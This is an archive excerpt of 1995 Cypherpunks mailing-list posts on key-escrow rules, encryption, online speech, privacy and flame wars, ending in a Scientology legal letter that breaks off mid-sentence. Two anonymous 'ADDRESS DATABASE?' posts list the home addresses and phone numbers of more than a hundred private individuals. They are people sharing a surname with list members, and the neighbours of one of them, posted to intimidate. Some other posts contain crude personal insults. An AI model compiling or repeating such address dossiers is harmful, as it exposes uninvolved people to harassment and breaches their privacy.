     have been escrowed with a U.S.-certified agent.
Key Access Requirements
7.   An escrow agent entity shall employ one or more persons      possess a SECRET clearance for purposes of processing
     classified (e.g., FISA) requests to obtain keys and/or key
     components.
8.   Escrow agent entities shall protect against unauthorized
     disclosure of information regarding the identity of the
     organization requesting the key or key components.
9.   Escrow agent entities shall maintain data regarding all      escrow requests received, key escrow components released,
     database changes, system administration accesses, and      of such events, for purposes of audit by appropriate
     government officials or others.
10.  Escrow agent entities shall maintain escrowed keys and/or
     key components for as long as such keys may be required to
     decrypt information relevant to a law enforcement
     investigation.
11.  Escrow agent entities shall provide key/key components to
     authenticated requests in a timely fashion and shall
     maintain a capability to respond more rapidly to emergency
     requirements for access.
12.  Escrow agent entities shall possess and maintain a
     Certificate of Good Standing from the State of      (or similar local/national authority).
13.  Escrow agent entities shall provide to the U.S. government      Dun & Bradstreet/TRW number or similar credit report      and authorization.
14.  Escrow agent entities shall possess and maintain an Errors      Omissions insurance policy.
15.  Escrow agent entities shall provide to the U.S. government      written copy of, or a certification of the existence of a
     corporate security policy governing the key escrow agent
     entity's operation.
16.  Escrow agent entities shall provide to the U.S. government      certification that the escrow agent will comply with all
     applicable federal, state, and local laws concerning the
     provisions of escrow agent entity services.
17.  Escrow agent entities shall provide to the U.S. government      certification that the escrow agent entity will transfer      another approved escrow agent the escrow agent entity's
     equipment and data in the event of any dissolution or      cessation of escrow agent entity operations.
18.  Escrow agent entities for products sold in the U.S. shall
     not be a foreign country or entity thereof, a national of      foreign country, or a corporation of which an alien is an
     officer or more than one-fourth of the stock which is      by aliens or which is directly or indirectly controlled by
     such a corporation.  Foreign escrow agent entities for
     products exported from the U.S. will be approved on a case
     by case basis as law enforcement and national security
     agreements can be negotiated.
19.  Escrow agent entities shall provide to the U.S. government      certification that the escrow agent entity will notify the
     U.S. government in writing of any changes in the forgoing
     information.
20.  Fulfillment of these and the other criteria are subject to
     periodic recertification.
*****************************************************  Elaine Frye
Computer Security Division
National Institute of Standards and Technology  Bldg. 820, M.S. Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233

@_date: 1995-12-09 05:33:56
@_author: Anonymous 
@_subject: E-Mail Privacy (CP boo) 
Forwarding Cyberia-L mail by: hayam at actcom.co.il (Avraham Hayam) on Sat, 9 Dec  6:16 AM
The only way for E-Mail Privacy on the internet is - ENCRYPTION.  You don"t have to be an Internet Expert to understand that data which is not encrypted is open for every On Oct. 20 1995 Andy Jonson-Laird  sent a most interesting data to the list concerning that the user has absulutly no control ever how the data is routed. A Mail that he sent to an address which is at the distance of 11 miles actualy did 1200 miles.
It may be  " The end of days vision" that privacy will be maintained without encryption. With the ongoing danger from the Cypherpunks, we must use very strong Algorithms. A French "algorithms cracker" recommended not long ago that the commercial sector have to use not less than 128 bytes based I will appreciate to receive list members opinion.
Avraham Hayam
IT Systems Security Consultants - ITSSC  P.O.Box 11233 Jerusalem, 91112 ISRAEL
Tel: + 972 - 2 - 761 803; Fax: + 972 - 2 - 769 263
E-Mail: hayam at actcom.co.il

@_date: 1995-12-09 06:03:56
@_author: Anonymous 
@_subject: Congress vs. the Internet 
NY Times, 9 Dec 1995, Op-Ed.
Congress vs. the Internet
   The courts have upheld free speech. Why won't
   legislators?
By Shari Steele (EFF staff counsel)
San Francisco. While the courts continue to uphold the
freedom of speech on the Internet, the First Amendment is
under attack on Capitol Hill. On Wednesday, House members
of a House-Senate conference committee said they would
support a stringent new measure that would not only bar
words and ideas on the worldwide computer network that
one might hear on TV or read in this newspaper, but would
make criminals out of anyone transmitting these materials
electronically, including on-line servces.
This measure goes against the spirit of three sensible
court decisions on copyright law handed down in recent
weeks, all involving the Church of Scientology.
The first decision, issued by a Federal judge in
California last month, held that Internet service
providers, the gatekeepers to the information highway,
cannot be held liable for copyright infringement when
they have no knowledge of the content of their users'
This decision is important, because, like the telephone
company, the system's providers merely offer a conduit
for communications. If they can be held liable for the
content of messages, they are more likely to monitor
those messages and censor any that include language that
might get them in trouble.
Just as we don't want the phone company censoring our
telephone calls, we should be very troubled by any
copyright law interpretation that would assign liability
to those who provide Internet service.
The second and third decisions were issued last week by
a Federal judge in northern Virginia. In those cases, the
judge, Leonie M. Brinkema, admonished the Church of
Scientology for using lawsuits to silence its on-line
critics. After two of its former members posted
electronic criticism of Church of Scientology writings,
the church brought charges against them, their Internet
service providers and The Washington Post for including
two sentences from church documents in an article on the
Judge Brinkema dismissed The Washington Post and two of
its reporters from the suit and held the Church of
Scientology and its affiliate responsible for the
newspaper's legal fees. "Although the Religious
Technology Center brought the complaint under traditional
secular concepts of copyright and trade secret law, it
has become clear that a much broader motivation prevailed

@_date: 1995-12-10 03:30:27
@_author: Anonymous 
@_subject: Warning about Pegasus Mail and PGP (fwd) 
Oh, PLEASE! Do you HAVE to go and mix up two completely
different issues? Aren't the nontechnical people trying to
follow these things likely to be confused enough without your
adding to that confusion? For every person who really understands the technical issues there are probably a thousand or ten thousand who are just trying to *use* the stuff without stepping into a deep hole.
An OS swap file is one kind of hole.  What Siberia is writing about is ANOTHER type of hole. If I wipe my swap file after each use of my machine and don't know that Pegasus is doing this, or think that because of what you wrote I'm no worse off, I've been done a serious disservice.
How about saying something USEFUL, like yes or no to the
question of whether sending WITHOUT queueing will make any
difference? How about agreeing that if David Harris hopes to
provide a useful interface to external "encryptors" he will
have to do something about this?  How about cc'ing David?
Somebody else could as well point out that we're all full of crap because we don't use Amigas, and while he might have a point, it wouldn't be a very useful one.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1995-12-10 17:30:13
@_author: Anonymous 
@_subject: GAK Query 
Steven Miller, in his "Civilizing Cyberspace," remarks in
his coverage of encryption issues that:
   ... the Administration is trying to split the [GAK]
   opposition by working with private industry groups on
   compromise escrow strategies that would let government
   agents see the contents of decoded messages without
   getting access to the escrowed key itself. [p. 306]
Does anyone know more about this tactic, whether it is
being pursued, or the legal and technical procedures for
decoding and seeing the messages?
As previously noted here:
Civilizing Cyberspace:
Policy, Power and the Information Highway
Steven E. Miller (CPSR Board)
Addison Wesley, 1996
ISBN 0-201-84760-4

@_date: 1995-12-14 11:00:15
@_author: Anonymous 
@_subject: And the standard continues to lower... 
The scheme is to send 4 digits of the credit card at a time. The
"explanation" follows.
Wilhelm Busch

@_date: 1995-12-15 02:57:26
@_author: Anonymous 
@_subject: ADDRESS DATABASE? 
Sandy Sandfort 7:51 AM 12/14/95 (not completely in this order):
    That is the correct response.
    What trick? For ~$150, you can buy a CD-ROM-set DB with every listed
phone number in the U.S. on it, faxes too; the info's rife with typos and has a lag of ~6-7 months, but what do you want? If you're willing to pay
more, you'll get more -- more accurate, more timely, more aggressively
correlated, more thorough info.
    Where's your new address, under a rock? ;)     Ironically, NFA status will get you on some very aggressive lists.
    [x] all of the above
    They are.
              ^^^^^^^
    Are you being serious? Ever heard of "information markets"? What,
are you a libertarian just because you don't like taxes? There are
other reasons for being one... :)
Detweiler   L           Detweiler   L S         Detweiler   Larry 8525 E Hampden Ave      3704 S 2nd St           2884 Ww Ave
Denver  CO              Austin TX               Parnell IA
80231-4826              78704-7073              52325-8825
303-695-0497            512-448-1750            319-628-4461
Detweiler Lynn          Detweiler   Lynn        Detweiler Lynn Teenline
                        1724 N Alabama St       1045 W Forevergreen Rd
North Liberty IA        Silver City NM          North Liberty IA
52317                   88061-4302              52317-9717
319-626-6272            505-538-2776            319-626-8216
      PS. Unless your postscript (in the classical sense) about getting
help making an adult film was a pickup line, maybe you could talk to one
of Detweiler's neighbors about it...
Allen Michael L
8525 E Hampden Ave
Denver, CO  80231-4826
Allerheiligen Shane & Robin
8525 E Hampden Ave
Denver, CO  80231-4826
Ambrosino Greg
8525 E Hampden Ave
Denver, CO  80231-4826
Anderson Michael W
8525 E Hampden Ave
Denver, CO  80231-4826
Armour Lyles
8525 E Hampden Ave
Denver, CO  80231-4826
Auslen James
8525 E Hampden Ave
Denver, CO  80231-4826
Baker Barbara
8525 E Hampden Ave
Denver, CO  80231-4826
Banks Mark
8525 E Hampden Ave
Denver, CO  80231-4826
Banner K
8525 E Hampden Ave
Denver, CO  80231-4826
Barison Joseph
8525 E Hampden Ave
Denver, CO  80231-4826
Becker Michelle
8525 E Hampden Ave
Denver, CO  80231-4826
Beckler Barbara
8525 E Hampden Ave
Denver, CO  80231-4826
Belloni Beecky
8525 E Hampden Ave
Denver, CO  80231-4826
Bennett Tim
8525 E Hampden Ave
Denver, CO  80231-4826
Berlin T A
8525 E Hampden Ave
Denver, CO  80231-4826
Berthonnaud Jon
8525 E Hampden Ave
Denver, CO  80231-4826
Biery Timothy
8525 E Hampden Ave
Denver, CO  80231-4826
Bond H M
8525 E Hampden Ave
Denver, CO  80231-4826
Bosworth Lisa
8525 E Hampden Ave
Denver, CO  80231-4826
Budd Edward K
8525 E Hampden Ave
Denver, CO  80231-4826
Chlopek Joanna
8525 E Hampden Ave
Denver, CO  80231-4826
Coleman Warren
8525 E Hampden Ave
Denver, CO  80231-4826
Cormier Keith
8525 E Hampden Ave
Denver, CO  80231-4826
Cox R
8525 E Hampden Ave
Denver, CO  80231-4826
Dayton C
8525 E Hampden Ave
Denver, CO  80231-4826
Dietz Scott
8525 E Hampden Ave
Denver, CO  80231-4826
Dillon C
8525 E Hampden Ave
Denver, CO  80231-4826
Donaldson Jennifer
8525 E Hampden Ave
Denver, CO  80231-4826
Dooley Patricia F
8525 E Hampden Ave
Denver, CO  80231-4826
Duke Alison
8525 E Hampden Ave
Denver, CO  80231-4826
Elizondo Arthuro
8525 E Hampden Ave
Denver, CO  80231-4826
Erfman Jeff
8525 E Hampden Ave
Denver, CO  80231-4826
Farris J
8525 E Hampden Ave
Denver, CO  80231-4826
Faulkner Theresa
8525 E Hampden Ave
Denver, CO  80231-4826
Fernandes Roland C
8525 E Hampden Ave
Denver, CO  80231-4826
Fouse Sue
8525 E Hampden Ave
Denver, CO  80231-4826
Fox J
8525 E Hampden Ave
Denver, CO  80231-4826
Gaffney Walter R
8525 E Hampden Ave 1513
Denver, CO  80231
Goodell Brooke
8525 E Hampden Ave
Denver, CO  80231-4826
Graham Calvin
8525 E Hampden Ave
Denver, CO  80231-4826
Grant Dallas
8525 E Hampden Ave
Denver, CO  80231-4826
Grosskreutz Vicki
8525 E Hampden Ave
Denver, CO  80231-4826
Hewett Vern
8525 E Hampden Ave
Denver, CO  80231-4826
Higgins Scott
8525 E Hampden Ave
Denver, CO  80231-4826
Howard W
8525 E Hampden Ave
Denver, CO  80231-4826
Howe Josh
8525 E Hampden Ave
Denver, CO  80231-4826
Huggins Scott
8525 E Hampden Ave
Denver, CO  80231-4826
Hunt Derek
8525 E Hampden Ave
Denver, CO  80231-4826
Hunter Lisa
8525 E Hampden Ave
Denver, CO  80231-4826
Jackson J C
8525 E Hampden Ave
Denver, CO  80231-4826
Jensen J A
8525 E Hampden Ave
Denver, CO  80231-4826
Kiolbasa Mike
8525 E Hampden Ave
Denver, CO  80231-4826
Klein Misty
8525 E Hampden Ave
Denver, CO  80231-4826
Leiker Ron
8525 E Hampden Ave
Denver, CO  80231-4826
Lenard P
8525 E Hampden Ave
Denver, CO  80231-4826
Lopez Jennifer
8525 E Hampden Ave
Denver, CO  80231-4826
Marinella Michelle D
8525 E Hampden Ave
Denver, CO  80231-4826
Mclane William T
8525 E Hampden Ave
Denver, CO  80231-4826
Mcqueen Mike
8525 E Hampden Ave
Denver, CO  80231-4826
Milbrath Jeff
8525 E Hampden Ave
Denver, CO  80231-4826
Moffit S L
8525 E Hampden Ave
Denver, CO  80231-4826
Murchison Rob
8525 E Hampden Ave
Denver, CO  80231-4826
Nash Jesse H
8525 E Hampden Ave
Denver, CO  80231-4826
Nichols Keith
8525 E Hampden Ave
Denver, CO  80231-4826
Palesch Mindi
8525 E Hampden Ave
Denver, CO  80231-4826
Parker L
8525 E Hampden Ave
Denver, CO  80231-4826
Peterson N C
8525 E Hampden Ave 720
Denver, CO  80231
Plunkett Lisa A
8525 E Hampden Ave
Denver, CO  80231-4826
Plybon Jonathan
8525 E Hampden Ave
Denver, CO  80231-4826
Reynolds Robert
8525 E Hampden Ave
Denver, CO  80231-4826
Richey Robert
8525 E Hampden Ave
Denver, CO  80231-4826
Sabourin William & Tasha
8525 E Hampden Ave
Denver, CO  80231-4826
Sanborn Bruce E
8525 E Hampden Ave
Denver, CO  80231-4826
Schroeder Paul
8525 E Hampden Ave
Denver, CO  80231-4826
Sears Marc & Denise
8525 E Hampden Ave
Denver, CO  80231-4826
Shaw R
8525 E Hampden Ave
Denver, CO  80231-4826
Short Maynard P
8525 E Hampden Ave
Denver, CO  80231-4826
Shriner Christopher S
8525 E Hampden Ave
Denver, CO  80231-4826
Sicles T A
8525 E Hampden Ave
Denver, CO  80231-4826
Sinks Curt E
8525 E Hampden Ave
Denver, CO  80231-4826
Smith J H
8525 E Hampden Ave
Denver, CO  80231-4826
Smith Marc G
8525 E Hampden Ave
Denver, CO  80231-4826
Sorrell Larry W
8525 E Hampden Ave
Denver, CO  80231-4826
States Michael W
8525 E Hampden Ave
Denver, CO  80231-4826
Steward E C
8525 E Hampden Ave
Denver, CO  80231-4826
Sullivan K
8525 E Hampden Ave
Denver, CO  80231-4826
Sunburst Apartments
8525 E Hampden Ave
Denver, CO  80231-4826
Terry Robert D
8525 E Hampden Ave
Denver, CO  80231-4826
Triplette J
8525 E Hampden Ave
Denver, CO  80231-4826
Vestal Patrick J
8525 E Hampden Ave
Denver, CO  80231-4826
Whaley Leigh
8525 E Hampden Ave
Denver, CO  80231-4826
White Epsie
8525 E Hampden Ave
Denver, CO  80231-4826
Williams Myrtle M
8525 E Hampden Ave
Denver, CO  80231-4826
Winfield Kurt
8525 E Hampden Ave
Denver, CO  80231-4826
Zullo Marie J
8525 E Hampden Ave 117
Denver, CO  80231

@_date: 1995-12-15 14:42:02
@_author: Anonymous 
@_subject: ADDRESS DATABASE? 
Some "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                           SANDY SANDFORT
      . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "
      You don't get it, do you?
Sandfort A & K
Irvine, CA  92714
Sandfort Christine
San Jose, CA  95113
Sandfort Curtis J
19841 River Rd
Gladstone, OR  97027-2285
Sandfort D
105 Cypress Ave
Santa Cruz, CA  95062-3710
Sandfort D O
780 N Circle D Way
Tucson, AZ  85748-3845
Sandfort Glenn & Sophia
24314 Carter Rd
Bothell, WA  98021-9413
Sandfort Jack
4057 Lower Honoapiilani Rd
Wailuku, HI  96793
Sandfort Jack L
6761 Hwy 49 N
Mariposa, CA  95338
Sandfort Joe
1203 SE Malden St
Portland, OR  97202-5935
Sandfort Rebecca F
1111 E Apache Blvd
Tempe, AZ  85281-8600
Sandfort Rick
850 Kimball Rd
Red Bluff, CA  96080-4533
Sandfort Robert & Marian
8575 Rue Jenny Ln
Los Molinos, CA  96055-9729
Sandfort Robert Jr & Joann
859 Locust St
Red Bluff, CA  96080-4218
Sandfort Astrid
3 Channing Cir
Cambridge, MA  02138-4715
Sandfort D
640 Sfourth Ave
Pleasantville, NJ  08232
Sandfort E
2641 Ridge Ave
Pleasantville, NJ  08233
Sandfort Ed & Donna
15 Kristin Way
Trenton, NJ  08690-2441
Sandfort Edward
8 Sixpence Ct
Huntington, NY  11743-6436
Sandfort G B
187 E 7th St
Clifton, NJ  07011-1739
Sandfort John
19 Sanfort Ln
Warwick, NY  10990-3136
Sandfort K
10 Annette Dr
Portsmouth, RI  02871-3704
Sandfort Karl
Spencer Rd
Red Hook, NY  12571
Sandfort Peter & Sandr
9 Peach Hill Ct
Ramsey, NJ  07446-1226
Sandfort Phil P
3907 Rippleton Rd
Cazenovia, NY  13035-9602
Sandfort R
481 Smithburg Ct
Jackson, NJ  08527-4444
Sandfort Sherri
434 W 52nd St
New York, NY  10019-6340
Sandfort Thomas D
1819 Beach Blvd
Point Pleasant, NJ  08742-5218
Sandfort A
235 Larry St
Augusta, KS  67010-1906
Sandfort Brad
Catrock Rd
Lake Ozark, MO  65049
Sandfort Brian
1215 11th St
West Des Moines, IA  50265-2574
Sandfort Charles
RR 3
Humboldt, NE  68376-9803
Sandfort David G
3610 W Clay St
Saint Charles, MO  63301-4433
Sandfort David G Cpa
3660 W Clay St
Saint Charles, MO  63301-4433
Sandfort David L
820 Timberwood Cir
Mc Kinney, TX  75069-9183
Sandfort Ed
Rm 307 1043 10th
Humboldt, NE  68376
Sandfort Edward L
4436 Windsor Ave
Kansas City, MO  64123-1736
Sandfort Fred F
1655 S Grorgetown
Wichita, KS  67208
Sandfort G
133 Kunze Dr
Saint Charles, MO  63303-5928
Sandfort G H
9802 NW Shaggy Bark Ln
Kansas City, MO  64152-2560
Sandfort Gerhard
1813 S Washington St
Casper, WY  82601-4853
Sandfort Gerhard Jr & Melanie
1500 W Odell Ave
Casper, WY  82604-4708
Sandfort Harold & Jackie
RR 2 Box 209a
Fremont, NE  68025-9696
Sandfort Howser
RR 3
Eldon, MO  65026-9803
Sandfort Irvin J
3614 W Clay St
Saint Charles, MO  63301-4433
Sandfort J
3229 Herrington Dr
Casper, WY  82604-5421
Sandfort James
844 Hollyridge Dr
Ballwin, MO  63011-3552
Sandfort Jane L
6009 Sandhurst Ln
Dallas, TX  75206-4730
Sandfort John R
214 Columbia St
Augusta, KS  67010-1535
Sandfort Kay
1024 S Spruce St
Casper, WY  82601-3621
Sandfort Keith
1315 East Ave
Holdrege, NE  68949-1323
Sandfort Larry
3034 W State St
Springfield, MO  65802-5168
Sandfort Leland K
Catrock Rd
Lake Ozark, MO  65049
Sandfort Loyd
108 W Brockman Ave
Eldon, MO  65026-2206
Sandfort Melvin
114 N Benton Ave
Saint Charles, MO  63301-2708
Sandfort Michael
844 Judson St
Lincoln, NE  68521-2633
Sandfort Michael
RR 1
Talmage, NE  68448-9801
Sandfort Neil
623 N 6th St
Seward, NE  68434-1405
Sandfort Robert
RR 1
Brock, NE  68320-9801
Sandfort Robert M
3612 W Clay St
Saint Charles, MO  63301-4433
Sandfort Roger
RR 3
Eldon, MO  65026-9803
Sandfort Ross
303 9th
Brock, NE  68320
Sandfort S C
Rt 1 Box 145-Dd
Augusta, KS  67010
Sandfort Sara
202 Manor Dr
Eldon, MO  65026-9678
Sandfort Waldo D
2150 Randolph St
Saint Charles, MO  63301-0844
Sandfort Wayne W
6969 Brentwood Ct
Arvada, CO  80004-1900
Sandfort Wm
PO Box 1393
Lake Ozark, MO  65049-1393
Sandfort Eva Rl Est
901 S Pine St
Spartanburg, SC  29302-3310
Sandfort Eva Rlest
901 S Pine St
Spartanburg, SC  29302-3310
Sandfort F
108 Thistle Knoll Ct
Asheville, NC  28803-2014
Sandfort John P
209 Woodgrove Trce
Spartanburg, SC  29301-6431
Sandfort John W
6540 Greyledge Ct
Alexandria, VA  22310-2410
Sandfort Mark R
Oakdale, PA  15071
Sandfort Marni
2140 L St NW
Washington, DC  20037-1510
Sandfort Raymond
Warren Center, PA  18851
Sandfort Ruth A
111 Jonthnct
Oakdale, PA  15071
Sandfort Sarah
114 Maury Ave
Charlottesville, VA  22903-3058
Sandfort Clarence
1016 Highway 63
Baldwin, WI  54002
Sandfort Daryl L
12676 W Hart St
Waukegan, IL  60087-1122
Sandfort David J
14 Wintergreen Ct
Downers Grove, IL  60517-1713
Sandfort E F
2400 S Finley Rd
Lombard, IL  60148-7029
Sandfort Gary
340 N Plum St
Carlinville, IL  62626-1316
Sandfort George
1380 Maple St
Baldwin, WI  54002-9395
Sandfort J
300 3rd St
Ann Arbor, MI  48103-4307
Sandfort J
6947 N Elm Tree Rd
Milwaukee, WI  53217-3705
Sandfort James
34217 N Stonebrdg Ln
Grayslake, IL  60030
Sandfort James
314 Oakridge Dr N
Hudson, WI  54016-1117
Sandfort John
3101 N 13th St
Terre Haute, IN  47804-1233
Sandfort John P
3149 N Mountain Maple Ct
South Bend, IN  46628-3716
Sandfort Larry
8225 Knox Ave S
Minneapolis, MN  55431-1413
Sandfort M Thos
2034 Chandler Ln
Columbus, IN  47203-4015
Sandfort Melissa
910 Lake St
Evanston, IL  60201-4319
Sandfort Melissa
706 Seward St
Evanston, IL  60202-2946
Sandfort Mike
7394 Christie Chapel Rd
Dublin, OH  43017-2415
Sandfort R W
275 E Dunedin Rd
Columbus, OH  43214-3803
Sandfort Ronald G
602 21st Ave W
Menomonie, WI  54751-3825
Sandfort Stephen
607 Washington Blvd
Oak Park, IL  60302-3954
Sandfort Stephen & Rebecca
218 Second Sheb Fls
Sheboygan Falls, WI  53085
Sandfort Steve
2654 Briarcliffe Ave
Cincinnati, OH  45212-1306
Sandfort A M
2903 Nepperhan Rd
Louisville, KY  40218-4715
Sandfort Christopher
10209 Barkley Dr
Jeffersontown, KY  40299-3120
Sandfort Federick H
2495 Paddock Way
Oviedo, FL  32765-8067
Sandfort Greg
1125 Carpenters Trce
Covington, KY  41017-4416
Sandfort J
1550 NE 191st St
Miami, FL  33179-4145
Sandfort Jeff
132 Landing Cir
Hazel Green, AL  35750-8807
Sandfort John F
11 Estes Dr
Bella Vista, AR  72714-5613
Sandfort Joseph & Lynn
311 Castle Blvd
Paris, KY  40361-2455
Sandfort M
14191 Georgian Cir
Fort Myers, FL  33912-5646
Sandfort Michael & Deb
457 Sun Lake Cir
Lake Mary, FL  32746-3332
Sandfort Phillip L
4623 Soundside Dr
Gulf Breeze, FL  32561-9275
Sandfort Road Assembly Of God
205 26th Ct
Phenix City, AL  36869-6463
Sandfort Scott & Robyn
401 E Intendencia St
Pensacola, FL  32501-6139
Sandfort Tad Rev
8304 Quail Run Dr
Zephyrhills, FL  33544-2048
Sandfort Terry N
1680 NE 191st St
Miami, FL  33179-4102
Sandfort Weldon W
407 Rock St
Dardanelle, AR  72834-3402
      This took about a minute using a shabby consumer-level DB.
      *Now* do you get it?

@_date: 1995-12-15 18:22:45
@_author: Anonymous 
@_subject: mailing list 
There's a test, Jerel.  You may retake it in three months.

@_date: 1995-12-16 04:40:47
@_author: Anonymous 
@_subject: ADDRESS DATABASE? 
Sandfort-8802 unit:
     It's kind of cool how much faith you have in the idea that
your number is unlisted, considering the fact that you started
this thread by griping that someone had the goods on you. The
reason you were "taken aback" is because your beliefs don't
correspond to reality -- "cognitive dissonance," in the lingo.

@_date: 1995-12-17 23:59:20
@_author: Anonymous 
@_subject: BosniaLINK 
URL:    BosniaLINK Banner
   Welcome to BosniaLINK, the official Department of Defense    system about U.S. military activities in Operation JOINT ENDEAVOR, the
   NATO peacekeeping mission in Bosnia. This system is provided by the
   Office of the Assistant to the Secretary of Defense for    Affairs. All information in BosniaLINK is publicly released
   information from the U.S. government or NATO headquarters.
   BosniaLINK contains operation maps, fact sheets, news    biographies of key commanders and leaders, and transcripts    briefings, speeches and testimony. It is also hyperlinked to the NATO
   and State Department information services.
     * Maps (Dec 8)
     * Fact Sheets (Dec 12)
     * News Releases (Dec 15)
     * Photos (Dec 15)
     * Biographies of Key Commanders and Leaders (Dec 15)
     * Transcripts of Briefings (Dec 15)
     * Speeches and Testimony (Dec 15)
  RELATED SITES FOR BOSNIA INFORMATION
   Air Force Role in Bosnia
   NATO
   U.S. State Department: U.S. Policy on Bosnia
   Navy News Service: Bosnia Operations
   BosniaLINK is provided through the cooperative efforts of the Office
   of The Assistant to the Secretary of Defense (Public Affairs), and the
   Defense Technical Information Center. This is a government    system.
   DefenseLINK Home

@_date: 1995-12-20 23:55:10
@_author: Anonymous 
@_subject: Cypherpunks resumes? 
Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts
in the archives anytime soon?  It would be nice to see a face connected
to the postings here.  Some of us don't get the chance of getting out
west for the parties, The only other thing I know about Tim May besides
being one of the Fathers of the Cypherpunks is that he was a naked hippie
in a hot tub at some party that Robert Hettinga was at some weeks ago,
That doesn't paint a good picture for me.

@_date: 1995-12-21 09:06:58
@_author: Anonymous 
@_subject: FWD: Intuit and SSNs 
What does our man in Intuit have to say about this?

@_date: 1995-12-21 18:20:40
@_author: Anonymous 
@_subject: Alta Vista caches queries 
Here's one more reason to worry about the implications of web search
engines: I just stopped in on Digital's new Alta Vista page, and was
surprised to find that the query field was filled in--with a search I ran
3 or 4 days ago. I doublechecked my end pretty thoroughly (scrubbing all
the files that Netscape 2.0b3 [Mac] generates--caches, global history,
etc., and eventually reinstaling Netscape from scratch). And it look an
awful lot like Alta Vista cached by query according to my IP address.
      Maybe dynamically assigned IPs ain't such a bad idea after all...

@_date: 1995-12-24 06:39:57
@_author: Anonymous 
@_subject: Polish telco policy change 
Pardons requested from those who rightly try to keep Cypherpunks focused.
If any of you can think of ways to get this message out and about, you'd
be doing a Good Thing: without bandwidth, privacy means a lot less.

@_date: 1995-12-26 07:48:00
@_author: Anonymous 
@_subject: corporate bashing 
Fred seems to have been slipping through my filters in recent days. Though I usually trash any message containing a reference to him, I thought that this latest escalation into the ionosphere of net-sillies begs to be brought to heel...
There are several things wrong with this, but first, just on
the surface: Fred has now dropped his cyberdrawers and stands
before us displaying the ugly engine of his manhood, the handle
by which he maintains a grip on his pointless existence. He
reveals himself to be yet another in that small, tired parade
of self-appointed lightning rods -- people with so little of
import in their lives that they have to resort to trolling for
what they can claim are offenses against them, then flex the
borrowed, imagined musculature of mindless law to rise in
self-righteous threats of exercise of vindictive wrath. This is worse than "My big brother will kick your ass!" It is
like a 90-pound weakling going to the beach with a large but
retarded cousin in tow. The idea is to troll to get sand kicked in his face, then to point to the drooling cousin and use him as a lever to gain and exercise control over the hapless dupes of the ruse.
Freds have existed on BBS's, and before the technological age in most small clubs and societies. In the Internet they show up in newsgroups and on mailing lists, and when crossed they ALWAYS descend to threats of legal action. So predictable, so utterly dull and unimaginative, they are like the party guest who has that inappropriate laugh, who doesn't seem to notice that pairs of people are together, who approaches people oddly and, in the end, makes a scene and reveals himself to be a complete fruitcake. Unmoderated fission looking for a place to Fred, you've come to the wrong place. If you want to be
ignored, just pack your terminal and stay home with the
sitcoms. Noone asked you to interject your trolls and threats
here. You invited yourself, and whatever you are suffering is of your own creation.
Speaking of Freds brings me to a more interesting aspect of this nonsense: How do we know there is only one Fred? Fred doesn't sign his messages...  oh-oh. This attack of deja vu feels like I've had it before.
Why do I get the feeling that Fred is about to embarrass himself terribly by blurting out some of the poison that fills his soul? Let him who hath not slandered cast the first suit.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1995-12-28 16:50:35
@_author: Anonymous 
@_subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE 
[ More non-crypto garbage deleted ]
But you do have much in common.  Perry did not say that you are Fred,
but instead implied he mixed the two of you up (quite understandable).
What's scary is a non-American foaming at the mouth about American
politics when I'm sure his own country is far from perfect.
P.S.  This post is in the public domain.
          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

@_date: 1995-12-28 17:54:28
@_author: Anonymous 
@_subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE 
[ More non-crypto garbage deleted ]
But you do have much in common.  Perry did not say that you are Fred,
but instead implied he mixed the two of you up (quite understandable).
What's scary is a non-American foaming at the mouth about American
politics when I'm sure his own country is far from perfect.
P.S.  This post is in the public domain.
          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

@_date: 1995-12-28 20:11:02
@_author: Anonymous 
@_subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE 
[ Non-crypto garbage deleted ]
The Vince Foster articles were more relevant than this
garbage (not to mention the fact they made more sense).
P.S.  This post is in the public domain.
          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

@_date: 1995-12-29 23:14:16
@_author: Anonymous 
@_subject: Chinese Cypherpunk quote  [NOISE] 
I see that some rants here are rubbing off on the folks who write
chinese fortune cookies, In tonites dinner, The cookie said:
The will of the people is the best law.
I wonder if we can get a couple thousand cookies sent to Congress with that message?
or to T.C.M.....

@_date: 1995-01-04 08:00:03
@_author: Name withheld on request 
@_subject: Warning letter from Co$. [any comments ?] 
January 3, 1995
     TO: INTERNET REMAILER OPERATORS
     FROM:  THOMAS M. SMALL
            COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
            PUBLICATIONS, INC.
          I  represent  Religious Technology Center ("RTC"), which
     owns the unpublished, confidential Advanced Technology of the
     religion of Scientology, and holds exclusive rights under the
     copyrights applicable to the Advanced  Technology  materials.
     I  also  represent Bridge Publications, Inc., which holds the
     exclusive  right  to  print,   publish   and   sell   various
     non-confidential  works  by  the  founder  of the Scientology
     religion,  L.   Ron  Hubbard,  and  to   make   and   publish
     compilations and derivative works of and from those works and
     to enforce all rights in them.
          It  has  come  to  my  attention  that  there  are   two
     alternate  newsgroups  on  the  Internet to which individuals
     have  been  annonymously  posting  certain  of  my   clients'
     published  and  unpublished  copyrighted materials, including
     certain of the confidential  Advanced  Technology  materials.
     These  confidential  materials  being posted were stolen from
     my client.  There is reason to  believe  that  the  materials
     which  are  uploaded by these users may also be downloaded by
     other users, and  that  these  activities  may  be  occurring
     through  the  systems  which  are  linked  into the Internet.
     The two newsgroups  into  which  these  materials  are  being
     copied    are   alt.technology.clearing   and   alt.religion.
     Scientology.
          We  request your assistance in dealing with the problem.
     The spread of  infringements  and  misappropriations  by  the
     users  will be lessened if you lock out from your systems the
